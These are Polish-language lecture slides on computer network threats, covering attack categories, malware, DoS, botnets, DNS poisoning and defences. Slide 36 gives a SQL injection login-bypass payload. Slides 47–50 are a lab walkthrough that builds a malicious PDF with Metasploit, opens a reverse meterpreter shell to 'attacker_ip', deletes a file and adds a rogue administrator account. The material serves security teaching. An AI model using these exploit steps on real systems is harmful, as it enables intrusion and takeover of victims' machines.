dr inż. Łukasz Sturgulewski, Zagrożenia w sieciach komputerowych

Transkrypt

1 Zagrożenia w sieciach komputerowych dr inż. Łukasz Sturgulewski, luk@iis.p.lodz.pl, Zagrożenia w sieciach komputerowych 1

2 Organizacja zajęć NIEDZIELA godz Wykład: 2godz. / tydzień (5 zjazdów) Laboratorium: 2godz. / tydzień (5 zjazdów) Zagrożenia w sieciach komputerowych 2

3 Plan prezentacji Internet Zagrożenia danych Typy ataków Metody obrony Zagrożenia w sieciach komputerowych 3

4 Internet Internet (ang. International - globalna, międzynarodowa; network sieć) Zbiór logicznie połączonych sieci w jednolitą sieć adresową opartą na protokole IP (ang. Internet Protocol). Zagrożenia w sieciach komputerowych 4

5 Internet Duży wpływ wojska na opracowywanie i wdrażanie nowych technologii. DoD (ang. Department of Defense) czyli Departament Obrony USA. ARPA (ang. Advanced Research Projects Agency) czyli Agencja ds. Badań Perspektywicznych Departamentu Obrony USA. Lata 60 badania mające na celu opracowanie systemu komunikacji, na potrzeby wojska i uniwersytetów stanowych. Sieć ARPANET (rok 1969): przesłanie pierwszej wiadomości pomiędzy Uniwersytetem Kalifornijskim w Los Angeles a Instytutem Badawczym Stanford. Zagrożenia w sieciach komputerowych 5

6 Internet Zagrożenia w sieciach komputerowych 6

7 Internet Sieć ARPANET wykorzystywała protokół sterowania siecią NCP (ang. Network Control Protocol), który umożliwiał między innymi: przesyłanie plików, logowanie się na zdalnej maszynie, drukowanie. W roku 1983 militarna część ARPANET została wydzielona jako MILNET (ang. Military Network), a sam ARPANET zaczął ustępować miejsca Internetowi, aby w roku 1990 oficjalnie zakończyć swą działalność. Zagrożenia w sieciach komputerowych 7

8 Internet w Polsce Pierwszy 17 sierpnia 1991r. z Wydziału Fizyki Uniwersytetu Warszawskiego do Centrum Komputerowego Uniwersytetu w Kopenhadze. 20 grudnia 1991 placówki naukowe Uniwersytetu Warszawskiego, Instytut Fizyki Jądrowej i Obserwatorium Astronomiczne oraz pojedyncze komputery w Krakowie, Toruniu i Katowicach zostały podłączone do Internetu. Zagrożenia w sieciach komputerowych 8

9 Internet w Polsce W czerwcu 1991 została uruchomiona sieć POLPAK Telekomunikacji Polskiej S.A. W roku 1992 jako pierwsza polska firma ATM S.A. uzyskała dostęp do Internetu. W sierpniu 1993 roku powstał pierwszy polski serwer WWW, pod nazwą "Polska Strona Domowa". W 1994 roku powstał rządowy serwer WWW. W 1995 roku powstał pierwszy polski portal internetowy Wirtualna Polska. W kwietniu 1996 roku TP S.A. uruchomiła dostęp do Internetu przez modemy. Zagrożenia w sieciach komputerowych 9

10 Internet w statystykach Zagrożenia w sieciach komputerowych 10

11 Zastosowanie (możliwości) nauka (np. e-learning) praca (np. telepraca, wideokonferencja) rozrywka (np. gry, zakupy, społeczność) Zagrożenia w sieciach komputerowych 11

12 Czy istnieje potrzeba edukacji w zakresie BSS? Podstawowe zagadnienia związane z bezpieczeństwem sieci komputerowych są ważne nie tylko dla osób pracujących w tej specjalności. Pracownik musi być świadomy zagrożeń. Systemy sieciowe (informatyczne) są powszechne stąd dla pracownika działu IT konieczność zrozumienia: zasad działania, zagrożeń, metod przeciwdziałania zagrożeniom. Zagrożenia w sieciach komputerowych 12

13 Zagrożone obszary IT Sprzęt Oprogramowanie Sieć komputerowa System operacyjny Bazy danych Serwery i hosty Zagrożenia w sieciach komputerowych 13

14 Zagrożenia danych Przechwycenie Internet Zagrożenia w sieciach komputerowych 14

15 Zagrożenia danych Przerwanie Internet Zagrożenia w sieciach komputerowych 15

16 Zagrożenia danych Fabrykacja, usunięcie Internet Zagrożenia w sieciach komputerowych 16

17 Zagrożenia danych Modyfikacja, usunięcie Internet Zagrożenia w sieciach komputerowych 17

18 Najistotniejsze cechy bezpiecznej transmisji danych Poufność (szyfrowanie) Autentyczność wiadomości (uwierzytelnianie) Integralność wiadomości (podpis) Zagrożenia w sieciach komputerowych 18

19 Zróżnicowanie zagrożeń Advanced Persistent Threat Zagrożenia w sieciach komputerowych 19

20 Modele bezpieczeństwa sieci Otwarty Restrykcyjny Zamknięty Zagrożenia w sieciach komputerowych 20

21 Popularność ataków 2014 Global Report on the Cost of Cyber Crime Ponemon Institute Research Report Sponsored by HP Enterprise Security Independently conducted by Ponemon Institute LLC Publication Date: October 2014 Study is based upon a representative sample of 257 larger-sized organizations (i.e., more than 1,000 enterprise seats) in various industry sectors in 7 countries (United States, United Kingdom, Germany, Australia, Japan, France, Russian Federation). FY 2014, 429 attacks in 257 organizations or 1.7 successful attacks per company each week FY 2013, 343 attacks in 234 organizations or 1.4 successful attacks per company each week FY 2012, 262 attacks in 199 organizations or 1.3 successful attacks per company each week Możliwe przyczyny: Wyszukane / złożone narzędzia Wiedza techniczna lata 90'te XXw. współczesność Zagrożenia w sieciach komputerowych 21

22 Czy ataki są groźne / kosztowne? 2014 Global Report on the Cost of Cyber Crime Ponemon Institute Research Report Sponsored by HP Enterprise Security Independently conducted by Ponemon Institute LLC Publication Date: October 2014 Zagrożenia w sieciach komputerowych 22

23 Kto i kogo atakuje? Zagrożenia w sieciach komputerowych 23

24 Początek Wysadzenie / uszkodzenie gazociągu syberyjskiego w 1982 roku. Zagrożenia w sieciach komputerowych 24

25 Kategorie ataków Zagrożenia w sieciach komputerowych 25

26 Rekonesans (rozpoznanie) Informacje o firmie, korporacji: nslookup, whois Detekcja działających jednostek. Skanowanie portów. Detekcja systemu i usług. Przechwycenie pakietów. Zagrożenia w sieciach komputerowych 26

27 Dostęp Atak typu dostęp wykorzystuje wykryte podatności do przejęcia kontroli nad wybranym zasobem, usługą, systemem: Hasła. Wykorzystanie zaufania (poprzez zaufane, słabiej chronione jednostki do zasobów silniej chronionych). Man-in-the-middle. Inżynieria społeczna, w tym: Phishing Zagrożenia w sieciach komputerowych 27

28 Typy ataków 2014 Global Report on the Cost of Cyber Crime Ponemon Institute Research Report Sponsored by HP Enterprise Security Independently conducted by Ponemon Institute LLC Publication Date: October 2014 Zagrożenia w sieciach komputerowych 28

29 Szkodniki (Malware) wirus (viruse) robak (worm) koń trojański (trojan horse) ransomware rootkit exploit keylogger dialer spyware adware malicious BHOs backdoor rogue security software Zagrożenia w sieciach komputerowych 29

30 DoS (Denial of Service) Zablokowanie usług poprzez: Łącza transmisyjne (przerwanie, przeciążenie) Urządzenia sieciowe (konfiguracja, przeciążenie) Systemy operacyjne (przepełnienie buforów) Serwery (przeciążenie) Usługi (przeciążenie, przepełnienie buforów) Zagrożenia w sieciach komputerowych 30

31 DDoS (Distributed Denial of Service) Atak DDoS = DoS z wielu punktów sieci. Zagrożenia w sieciach komputerowych 31

32 SYN Flood Attack Atakujący podszywa się pod nieistniejący adres IP i zalewa cel pakietami SYN. Cel odpowiada na pakiety SYN poprzez wysłanie pakietów SYN-ACK na nieistniejący adres IP. Cel przepełnia swój bufor zbyt dużą liczbą embryonic connections i przestaje odpowiadać na prawidłowy ruch. Zagrożenia w sieciach komputerowych 32

33 Aplikacje webowe W 2020 roku ponad 80% to aplikacje webowe! Główne, obecne zagrożenia: Injection Attacks, PHP Remote File Includes, Cross Site Scripting (XSS), Cross Site Request Forgeries (CSRF), Insecure Communications Zagrożenia w sieciach komputerowych 33

34 SQL Injection Imperva: SQLinjection has been responsible for 83% of successful hacking-related data breaches ( ) Wstrzyknięcie Injection szkodliwych, spreparowanych przez intruza, danych do interpretera. Wyszukanie stron w aplikacji webowej, które akceptują wprowadzane przez użytkowników informacje w celu dostępu do bazy: login form, signup form, forgot password form, dynamiczne strony używające zmiennych w URL takich jak ID produktu. Włamania typu SQL injection wynikają z dwóch głównych przyczyn: braku lub niewystarczającej walidacji danych wejściowych, braku kodowania znaków specjalnych przed wstawieniem do zapytania SQL. Zagrożenia w sieciach komputerowych 34

35 Przykład SQL Injection Załóżmy że na stronie znajduje się następujący formularz: <form method="post" action="login.php"> Login: <input type="text" name="login"><br> Hasło: <input type="password" name="pass"><br> <input type="submit" value="zaloguj się"><br> </form> Po stronie serwera, w kodzie PHP tworzone i wykonywane jest następujące zapytanie: SELECT USER_ID FROM USERS WHERE (LOGIN='$login') AND (PASS='$pass') Zagrożenia w sieciach komputerowych 35

36 Przykład SQL Injection Intruz wpisuje w pole hasło: ' OR '1'='1 Zapytanie, które zostanie wykonane będzie następujące: SELECT USER_ID FROM USERS WHERE (LOGIN='admin') AND (PASS='' OR '1'='1') Zagrożenia w sieciach komputerowych 36

37 Botnet Botnet zbiór węzłów sieci (hostów) zainfekowanych złośliwym oprogramowaniem (podobnym do robaka, którego celem jest rozprzestrzenianie, niewidocznym dla użytkownika) dającym możliwość, jego twórcom, zdalnej kontroli nad wszystkimi zainfekowanymi węzłami. Zombie pojedynczy węzeł sieci botnet. Botnet = armia zombie. Typowe zastosowania: rozsyłanie spamu, ataki DDoS (Distributed Denial of Service), kradzież poufnych informacji, sabotaż, oszustwa, inwigilacja. Zagrożenia w sieciach komputerowych 37

38 Botnet NASK przejmuje domeny polskiego botnetu Virut Virut to botnet dzieło polskich programistów. Jego wielkość szacuje się na ok zainfekowanych maszyn, a botnet jest wykorzystywany do spamu, kradzieży danych i ataków DDoS. Swoje centrum dowodzenia miał w Polsce. Do dzisiaj NASK właśnie poinformował, że przejął 23 polskie domeny, które wykorzystywane były w atakch Virutem. Jest to pierwszy przypadek, w którym NASK decyduje się na tak drastyczne decyzje, jak siłowe odebranie domeny jej właścicielowi ale nie ulega wątpliwości, że w tym przypadku jest to słuszna i długo wyczekiwana decyzja. NASK do tej pory, w przeciwieństwie do innych registrarów nie nakładał żadnych sankcji na złośliwe domeny. Domeny Viruta wskazują obecnie na adres należący do NASK-u. Z naszych informacji wynika, że już od kilku lat Virut był wnikliwie analizowany przez zespół CERT Polska. Dzięki temu ustalono, że C&C Viruta było utrzymywane m.in. na domenach zief.pl oraz ircgalaxy.pl, które dziś zostały wyłączone przez NASK. Techniką sinkholingu pozyskano także informację o 890 tysiącach unikalnych adresów IP zainfekowanych Virutem użytkowników. Na botnecie tej wielkości można uzyskać przychody rzędu złotych w skali roku. 18/1/ Zagrożenia w sieciach komputerowych 38

39 DNS cache poisoning Typy serwerów: Authoritative (autorytatywne) Recursive (nieautorytatywne) Podstawa działania serwerów DNS: Jeśli serwer DNS Recursive nie zna adresu domeny pyta o niego serwer Authoritative dla tej domeny. Serwer Authoritative odpowiada a serwer Recursive zapamiętuje tę odpowiedź przez określony czas i udostępnia ją zainteresowanym. Zagrożenia w sieciach komputerowych 39

40 DNS cache poisoning Opis ataku: Atakujący zasypuje atakowany serwer Recursive zapytaniami o domeny podobne do 1q2w3e.mojbank.com. Serwer nie zna oczywiście odpowiedzi, pyta więc serwer Authoritative o dane domeny 1q2w3e.mojbank.com Z odpowiedzią spieszy atakujący zasypując atakowany serwer Recursive fałszywymi odpowiedziami (duża liczba zwiększa szanse odgadnięcia numeru portu i ID w zapytaniu DNS są to podstawowe mechanizmy bezpieczeństwa). Fałszywe odpowiedzi zwierają nie tylko adres dla domeny 1q2w3e.mojbank.com ale także adres fałszywego serwera DNS dla domeny, pod którą atakujący chce się podszyć. Teraz gdy przyjdzie zwykłe zapytanie o domenę mojbank.com zaatakowany serwer Recursive zwróci się o podanie jej adresu do intruza. Zagrożenia w sieciach komputerowych 40

41 Przykład: CVE Zagrożenia w sieciach komputerowych 41

42 Przygotowanie środowiska Na każdym PC: 2 x wirtualna maszyna: Kali Linux WinXP SP3 Połączenie sieciowe wirtualnych maszyn. Zagrożenia w sieciach komputerowych 42

43 Przygotowanie środowiska Zagrożenia w sieciach komputerowych 43

44 Przygotowanie środowiska Zagrożenia w sieciach komputerowych 44

45 Przygotowanie środowiska Konfiguracja adresów IP w: Win XP SP3 IP: maska: Kali Linux IP: maska: Zagrożenia w sieciach komputerowych 45

46 Weryfikacja podatności / bezpieczeństwa Zagrożenia w sieciach komputerowych 46

47 Weryfikacja podatności / bezpieczeństwa przygotowanie PDF'a use exploit/windows/fileformat/adobe_utilprintf set PAYLOAD windows/meterpreter/reverse_tcp set LHOST attacker_ip set LPORT 4444 set FILENAME raport.pdf show options exploit mv /root/.msf4/local/raport.pdf /var/www/html /etc/init.d/apache2 start przygotowanie Serwer use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST attacker_ip set LPORT 4444 show options exploit Zagrożenia w sieciach komputerowych 47

48 Weryfikacja podatności / bezpieczeństwa Pobranie poprzez przeglądarkę i uruchomienie przygotowanego PDF na komputerze z WinXP SP3 + Adobe Reader (AdbeRdr812_en_US.exe) Zagrożenia w sieciach komputerowych 48

49 Przykład: CVE Zagrożenia w sieciach komputerowych 49

50 Weryfikacja podatności / bezpieczeństwa utworzenie nowego konta na podatnej maszynie ps aux (odczytać PID dla procesu Explorer.exe) migrate explorer_pid (migracja Meterpreter'a do procesu Explorer.exe) run getgui -e shell cd Desktop del supertajny.doc net user hk hk /add net localgroup Administrators hk /add Zagrożenia w sieciach komputerowych 50

51 zero-day Zagrożenia w sieciach komputerowych 51

52 zero-day Nowy wirus (robak, trojan) wcześniej wolna propagacja, dziś błyskawiczna. Nowa podatność ( dziura ) w oprogramowaniu (usługach, bazach, ) odkrycie, użycie (wcześniejszy rekonesans pozwala stwierdzić z czego korzysta nasz cel), załatanie. Zagrożenia w sieciach komputerowych 52

53 APT (Advanced Persistent Threat) Zagrożenia w sieciach komputerowych 53

54 Watering Hole wodopój Zagrożenia w sieciach komputerowych 54

55 Normy, standardy, raporty techniczne Normy, standardy, raporty techniczne: ISO Wymagania ISO (ISO 27002) Wytyczne ISO TR Wytyczne IT BS Ocena ryzyka BS Ciągłość działania PAS 56 Ciągłość działania ISO/IEC IT Network Security Zagrożenia w sieciach komputerowych 55

56 Bezpieczeństwo proces ciągły jak to zrobić? Security Policy co chronić, przed czym chronić, szacowanie ryzyka jak to zrobić? Security Wheel To nie jest jednorazowe działanie. Firewall Zagrożenia w sieciach komputerowych 56

57 Korporacyjne zapory sieciowe Gartner: firma analityczno-doradcza zagadnienia wykorzystania i zarządzania technologiami informacyjnymi Zagrożenia w sieciach komputerowych 59

58 Korporacyjne zapory sieciowe INTERNET External Threats Internal Threats IDS & IPS AppSecure Enhanced Web Filtering Antivirus IDP detects/stops Worms, Trojans, DoS (L4 & L7), Scans Application level visibility and classification Application level policies tied to user roles Block access to unapproved sites Real time threat score for each URL Stops viruses, file-based trojans or spread of spyware, adware, keyloggers Antispam Stops Spam/Phishing Content Filtering Blocks transmission of files for Data Loss Prevention Core Security Firewall, VPN, Unified Access Control Zagrożenia w sieciach komputerowych 60

59 IDS vs IPS Zagrożenia w sieciach komputerowych 61

60 Zagrożenia w sieciach komputerowych KONIEC Zagrożenia w sieciach komputerowych 62